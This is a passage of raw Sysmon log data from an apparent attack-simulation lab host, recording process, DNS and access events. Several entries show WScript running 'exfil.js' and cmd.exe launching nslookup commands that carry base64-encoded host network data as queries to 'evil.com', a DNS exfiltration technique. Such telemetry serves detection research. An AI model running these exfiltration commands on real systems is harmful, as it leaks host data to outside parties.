14:16:24.801{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B8-629A-A33F-000000005F02}5920C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198430Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.795{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198429Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.794{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198428Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.794{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198427Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.794{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198426Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.793{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B8-629A-A23F-000000005F02}8100C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198425Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.792{2E1864BB-17A1-629A-783D-000000005F02}55527700C:\Windows\System32\WScript.exe{2E1864BB-17B8-629A-A23F-000000005F02}8100C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198424Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.792{2E1864BB-17B8-629A-A23F-000000005F02}8100C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A TUFDQWRkcmVzczogMDI6RjA6NEI6MUU6QUM6Q0E= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltkus.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000198423Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.776{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlezym.tmpMD5=1672107762ECEA7286E9D317B1D4872B,SHA256=4B917B4BC62A2EA4AC7C36E28B121764EAC51D071330300C02B5F6C0A7A1F19F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000198422Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.761{2E1864BB-17B8-629A-A03F-000000005F02}54886680C:\Windows\system32\conhost.exe{2E1864BB-17B8-629A-A13F-000000005F02}1144C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198421Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.746{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198420Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.746{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B8-629A-A13F-000000005F02}1144C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198419Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.746{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198418Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.746{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198417Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.746{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198416Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.746{2E1864BB-17B8-629A-9F3F-000000005F02}41883300C:\Windows\system32\cmd.exe{2E1864BB-17B8-629A-A13F-000000005F02}1144C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198415Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.758{2E1864BB-17B8-629A-A13F-000000005F02}1144C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A SVB2NjogZmU4MDo6ZmMwMzpjOWUyOmIwNjg6OWY3MQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B8-629A-9F3F-000000005F02}4188C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A SVB2NjogZmU4MDo6ZmMwMzpjOWUyOmIwNjg6OWY3MQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlezym.tmp 2>&1 354300x8000000000000000198414Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.320{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52525- 10341000x8000000000000000198413Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.732{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17B8-629A-A03F-000000005F02}5488C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000198412Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.320{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52524- 10341000x8000000000000000198411Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.732{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B8-629A-A03F-000000005F02}5488C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000198410Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.320{00000000-0000-0000-0000-000000000000}7260<unknown process>-udptruefalse127.0.0.1-52524-false127.0.0.1-53domain 354300x8000000000000000198409Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.319{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52523- 354300x8000000000000000198408Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.231{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52522- 354300x8000000000000000198407Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.127{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52521- 354300x8000000000000000198406Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.126{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52520- 354300x8000000000000000198405Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.126{00000000-0000-0000-0000-000000000000}5108<unknown process>-udpfalsefalse127.0.0.1-52519-false127.0.0.1-53domain 354300x8000000000000000198404Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.126{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52519- 10341000x8000000000000000198403Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.732{2E1864BB-17B8-629A-A03F-000000005F02}54886680C:\Windows\system32\conhost.exe{2E1864BB-17B8-629A-9F3F-000000005F02}4188C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198402Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.698{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B8-629A-A03F-000000005F02}5488C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198401Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.698{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198400Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.698{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198399Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.698{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x8000000000000000198398Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.548{00000000-0000-0000-0000-000000000000}336evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000198397Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.698{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x8000000000000000198396Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.481{00000000-0000-0000-0000-000000000000}7584evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000198395Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.698{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B8-629A-9F3F-000000005F02}4188C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 22542200x8000000000000000198394Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.396{00000000-0000-0000-0000-000000000000}6560evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000198393Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.696{2E1864BB-17A1-629A-783D-000000005F02}55523916C:\Windows\System32\WScript.exe{2E1864BB-17B8-629A-9F3F-000000005F02}4188C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x8000000000000000198392Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.322{00000000-0000-0000-0000-000000000000}7260evil.com0::ffff:127.0.0.1;<unknown process> 154100x8000000000000000198391Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.695{2E1864BB-17B8-629A-9F3F-000000005F02}4188C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft 